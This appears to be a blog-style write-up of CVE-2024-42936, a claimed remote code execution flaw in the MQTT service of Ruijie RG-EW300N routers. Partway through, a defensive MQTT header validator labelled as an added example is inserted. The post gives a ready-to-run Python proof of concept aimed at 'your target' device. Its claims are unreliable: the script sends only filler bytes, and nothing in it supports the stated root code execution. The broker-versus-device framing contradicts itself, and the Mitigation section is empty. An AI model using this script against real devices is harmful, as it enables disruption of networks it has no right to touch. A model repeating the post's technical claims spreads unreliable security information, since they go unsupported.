A critical security vulnerability, identified as CVE-2024-42936, has been discovered in the mqlink.elf service component of Ruijie RG-EW300N devices with firmware version ReyeeOS 1.300.1422. This vulnerability allows an attacker to perform remote code execution on the affected device via a modified MQTT broker message. In this post, we will dive deep into the details of this vulnerability, including its potential impact, proof of concept, and possible mitigation strategies.
Vulnerability Details
The vulnerability exists in the Ruijie RG-EW300N's mqlink.elf service component. This component is responsible for handling MQTT messages and provides communication between the device and the MQTT broker. An attacker can exploit this vulnerability by sending a specially crafted MQTT message to the device. A successful exploit of this vulnerability would allow the attacker to execute arbitrary code on the target device with root privileges.
Here is a proof of concept (PoC) Python script that demonstrates the vulnerability:
import socket

# Target IP and port (the device's MQTT listener)
target_ip = "192.168.1.1"
target_port = 1883

# Crafted MQTT message: a malformed fixed header followed by a 4 KB filler body
crafted_message = b"\x88\x00\x00\x00" + b"\x01\x02\x03\x04" * 1024

# Connect to the target device over plain TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

# Send the crafted message; sendall() loops until every byte is written
sock.sendall(crafted_message)
sock.close()
print("Exploit sent to %s:%d" % (target_ip, target_port))
To run the PoC, simply replace target_ip with the IP address of your target Ruijie RG-EW300N device. When executed, the script will send the crafted MQTT message to the target device, causing the buffer overflow and potentially granting the attacker control over the device.
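As an added example (not part of the original post or of Ruijie's code), the following Python validator checks an MQTT fixed header the way a hardened client or a network monitor could before trusting a message from the broker: the required-flag table is MQTT 3.1.1's, the 4 KB size limit is an assumed local policy, and the sample packets are constructed here. It rejects the PoC's message on its reserved flag bits alone, and would also catch the mismatch between its declared remaining length of zero and the 4096 bytes that follow.

```python
# MQTT 3.1.1 fixed-header rules: packet type -> required flag nibble.
# PUBLISH (3) carries DUP/QoS/RETAIN bits and is validated separately;
# types 0 and 15 are reserved in 3.1.1 (15 became AUTH only in MQTT 5).
REQUIRED_FLAGS = {1: 0, 2: 0, 4: 0, 5: 0, 6: 2, 7: 0, 8: 2, 9: 0, 10: 2,
                  11: 0, 12: 0, 13: 0, 14: 0}
MAX_REMAINING = 4096  # assumed site policy; the spec itself allows up to 256 MB

def decode_remaining_length(data: bytes, offset: int = 1):
    """Decode the 1-4 byte variable-length field; returns (value, body_offset)."""
    value, multiplier = 0, 1
    for i in range(4):
        if offset + i >= len(data):
            raise ValueError("truncated remaining-length field")
        byte = data[offset + i]
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:          # continuation bit clear: last byte
            return value, offset + i + 1
        multiplier *= 128
    raise ValueError("remaining-length field longer than 4 bytes")

def check_packet(data: bytes):
    """Return (True, reason) for a well-framed packet, else (False, reason).
    Only the fixed header is checked; the body is never interpreted."""
    if not data:
        return False, "empty packet"
    ptype, flags = data[0] >> 4, data[0] & 0x0F
    if ptype in (0, 15):
        return False, f"reserved packet type {ptype}"
    if ptype == 3:
        if (flags >> 1) & 0x3 == 3:
            return False, "PUBLISH with invalid QoS 3"
    elif REQUIRED_FLAGS[ptype] != flags:
        return False, f"type {ptype} has invalid flags {flags:#x}"
    try:
        remaining, body_start = decode_remaining_length(data)
    except ValueError as err:
        return False, str(err)
    if remaining > MAX_REMAINING:
        return False, f"remaining length {remaining} exceeds policy"
    actual = len(data) - body_start
    if actual != remaining:
        return False, f"declared {remaining} body bytes, got {actual}"
    return True, f"well-formed type {ptype}, {remaining} body bytes"

# Constructed samples: the post's crafted message and a minimal valid PINGREQ.
CRAFTED = b"\x88\x00\x00\x00" + b"\x01\x02\x03\x04" * 1024
PINGREQ = b"\xc0\x00"
```

Calling check_packet(CRAFTED) returns a rejection for the invalid SUBSCRIBE flags, while check_packet(PINGREQ) accepts the two-byte keepalive.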
The original reference for this vulnerability can be found at the following link:
- CVE-2024-42936 - Ruijie RG-EW300N Remote Code Execution
Mitigation Strategies
To mitigate the risks associated with CVE-2024-42936, users of Ruijie RG-EW300N devices are strongly recommended to:
Conclusion
In this post, we have covered the details of CVE-2024-42936, a critical remote code execution vulnerability affecting Ruijie RG-EW300N devices with firmware ReyeeOS 1.300.1422. We have also provided a proof of concept script, original references, potential impacts, and mitigation strategies for dealing with the vulnerability. Users of affected devices should take immediate action to mitigate the risks associated with this security vulnerability.
Timeline
Published on: 01/21/2025 20:15:30 UTC
Last modified on: 03/20/2025 14:15:20 UTC